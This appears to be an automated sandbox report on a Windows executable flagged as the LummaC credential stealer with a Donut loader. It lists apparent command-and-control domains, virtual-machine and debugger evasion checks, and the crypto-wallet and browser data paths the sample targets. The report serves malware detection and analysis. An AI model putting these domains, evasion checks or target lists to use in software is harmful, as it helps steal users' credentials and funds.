Source: New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: New Upd v1.1.0.exe, 00000000.00000003.1816237689.0000000003A35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: New Upd v1.1.0.exe, 00000000.00000003.1861824939.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: New Upd v1.1.0.exe, 00000000.00000003.1861824939.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: New Upd v1.1.0.exe, 00000000.00000003.1838952572.00000000039E7000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1838721426.00000000039E7000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1816237689.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1816371099.00000000039E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: New Upd v1.1.0.exe, 00000000.00000003.1816371099.00000000039C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: New Upd v1.1.0.exe, 00000000.00000003.1838952572.00000000039E7000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1838721426.00000000039E7000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1816237689.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1816371099.00000000039E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: New Upd v1.1.0.exe, 00000000.00000003.1816371099.00000000039C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: New Upd v1.1.0.exe, 00000000.00000003.1861824939.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: New Upd v1.1.0.exe, 00000000.00000003.1861824939.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: New Upd v1.1.0.exe, 00000000.00000003.1861824939.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: New Upd v1.1.0.exe, 00000000.00000003.1861824939.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: New Upd v1.1.0.exe, 00000000.00000003.1861824939.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.91:443 -> 192.168.2.4:49745 version: TLS 1.2

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe

Code function: 0_2_007F9170 BeginPaint,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,BitBlt,SelectPalette,SelectObject,DeleteDC,EndPaint,DeleteObject,DeleteObject,GetAsyncKeyState,GetTickCount,KillTimer,SendMessageA,DestroyWindow,

0_2_007F9170

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1957889164.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E37E21	0_3_00E37E21
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E37E21	0_3_00E37E21
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E37E21	0_3_00E37E21
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E37E21	0_3_00E37E21
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E37E21	0_3_00E37E21
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E37E21	0_3_00E37E21
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E37E21	0_3_00E37E21
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E37E21	0_3_00E37E21
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E37E21	0_3_00E37E21
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E37E21	0_3_00E37E21
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E37E21	0_3_00E37E21
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E37E21	0_3_00E37E21
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E37E21	0_3_00E37E21
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E37E21	0_3_00E37E21
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E37E21	0_3_00E37E21
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E37E21	0_3_00E37E21
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_2_008154A5	0_2_008154A5
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_2_00814D3A	0_2_00814D3A
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_2_0081C0DB	0_2_0081C0DB
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_2_00815020	0_2_00815020
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_2_0081B201	0_2_0081B201
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_2_00815213	0_2_00815213
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_2_0080E230	0_2_0080E230
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_2_0081D231	0_2_0081D231
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_2_0080B254	0_2_0080B254
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_2_0080735C	0_2_0080735C
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_2_00813362	0_2_00813362

Source: New Upd v1.1.0.exe

Static PE information: invalid certificate

Source: New Upd v1.1.0.exe, 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCatTools_Manager.exe<?xml version='1.0' encoding='UTF-8' standalone='yes'?> vs New Upd v1.1.0.exe
Source: New Upd v1.1.0.exe, 00000000.00000003.1766578766.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCatTools_Manager.exe<?xml version='1.0' encoding='UTF-8' standalone='yes'?> vs New Upd v1.1.0.exe
Source: New Upd v1.1.0.exe	Binary or memory string: OriginalFilenameCatTools_Manager.exe<?xml version='1.0' encoding='UTF-8' standalone='yes'?> vs New Upd v1.1.0.exe

Source: New Upd v1.1.0.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 00000000.00000002.1957889164.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: New Upd v1.1.0.exe

Static PE information: Section: .pdata ZLIB complexity 1.0001650421047508

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: New Upd v1.1.0.exe, 00000000.00000003.1816091583.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1838777067.00000000039A8000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe

File read: C:\Users\user\Desktop\New Upd v1.1.0.exe

Jump to behavior

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: New Upd v1.1.0.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: New Upd v1.1.0.exe

Static file information: File size 2510896 > 1048576

Source: New Upd v1.1.0.exe

Static PE information: Raw size of .pdata is bigger than: 0x100000 < 0x141000

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe

Code function: 0_2_007FF400 _memset,_memset,LoadLibraryA,GetProcAddress,

0_2_007FF400

Source: initial sample

Static PE information: section where entry point is pointing to: .text1

Source: New Upd v1.1.0.exe

Static PE information: real checksum: 0x94f2747 should be: 0x2698da

Source: New Upd v1.1.0.exe	Static PE information: section name: .text1
Source: New Upd v1.1.0.exe	Static PE information: section name: .adata
Source: New Upd v1.1.0.exe	Static PE information: section name: .data1

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E28A78 push ebp; retf 0071h	0_3_00E28A8A
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E28A78 push ebp; retf 0071h	0_3_00E28A8A
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E28A78 push ebp; retf 0071h	0_3_00E28A8A
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E28A78 push ebp; retf 0071h	0_3_00E28A8A
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E28A78 push ebp; retf 0071h	0_3_00E28A8A
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E29251 push esi; retn 0072h	0_3_00E29252
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E29251 push esi; retn 0072h	0_3_00E29252
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E29251 push esi; retn 0072h	0_3_00E29252
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E29251 push esi; retn 0072h	0_3_00E29252
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E29251 push esi; retn 0072h	0_3_00E29252
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E28280 push esp; retf	0_3_00E28292
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E28280 push esp; retf	0_3_00E28292
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E28280 push esp; retf	0_3_00E28292
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E28280 push esp; retf	0_3_00E28292
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E28280 push esp; retf	0_3_00E28292
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E29291 push esi; retf 0072h	0_3_00E29292
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E29291 push esi; retf 0072h	0_3_00E29292
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E29291 push esi; retf 0072h	0_3_00E29292
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E29291 push esi; retf 0072h	0_3_00E29292
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E29291 push esi; retf 0072h	0_3_00E29292
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E28A78 push ebp; retf 0071h	0_3_00E28A8A
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E28A78 push ebp; retf 0071h	0_3_00E28A8A
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E28A78 push ebp; retf 0071h	0_3_00E28A8A
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E28A78 push ebp; retf 0071h	0_3_00E28A8A
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E28A78 push ebp; retf 0071h	0_3_00E28A8A
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E29251 push esi; retn 0072h	0_3_00E29252
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E29251 push esi; retn 0072h	0_3_00E29252
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E29251 push esi; retn 0072h	0_3_00E29252
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E29251 push esi; retn 0072h	0_3_00E29252
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E29251 push esi; retn 0072h	0_3_00E29252
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: 0_3_00E28280 push esp; retf	0_3_00E28292

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-8644

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe

API coverage: 0.6 %

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe TID: 7704	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe TID: 7728	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: New Upd v1.1.0.exe, 00000000.00000003.1957164332.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935726270.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958057888.0000000000D91000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956886066.0000000000D91000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958057888.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1888319727.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956886066.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe

Code function: 0_2_0080B245 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0080B245

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe

Code function: 0_2_007FF400 _memset,_memset,LoadLibraryA,GetProcAddress,

0_2_007FF400

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe

Code function: 0_2_0080B245 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0080B245

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: New Upd v1.1.0.exe	String found in binary or memory: cashfuzysao.buzz
Source: New Upd v1.1.0.exe	String found in binary or memory: hummskitnj.buzz
Source: New Upd v1.1.0.exe	String found in binary or memory: screwamusresz.buzz
Source: New Upd v1.1.0.exe	String found in binary or memory: appliacnesot.buzz
Source: New Upd v1.1.0.exe	String found in binary or memory: scentniej.buzz
Source: New Upd v1.1.0.exe	String found in binary or memory: inherineau.buzz
Source: New Upd v1.1.0.exe	String found in binary or memory: prisonyfork.buzz
Source: New Upd v1.1.0.exe	String found in binary or memory: rebuildeso.buzz
Source: New Upd v1.1.0.exe	String found in binary or memory: begguinnerz.biz

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,	0_2_008190C3
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_008180D7
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	0_2_00810004
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_00818018
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,	0_2_008191FE
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_0081813C
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,	0_2_00818178
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,	0_2_00819239
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_00819376

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe

Code function: 0_2_00801000 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_00801000

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: New Upd v1.1.0.exe, 00000000.00000002.1958189458.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956864556.0000000000E24000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: New Upd v1.1.0.exe PID: 7576, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: New Upd v1.1.0.exe	String found in binary or memory: s/Electrum-LTC
Source: New Upd v1.1.0.exe, 00000000.00000003.1957164332.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: New Upd v1.1.0.exe	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: New Upd v1.1.0.exe, 00000000.00000003.1957164332.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: New Upd v1.1.0.exe, 00000000.00000003.1888319727.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: New Upd v1.1.0.exe	String found in binary or memory: ExodusWeb3
Source: New Upd v1.1.0.exe, 00000000.00000003.1957164332.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: New Upd v1.1.0.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: New Upd v1.1.0.exe, 00000000.00000003.1888176130.0000000000E19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

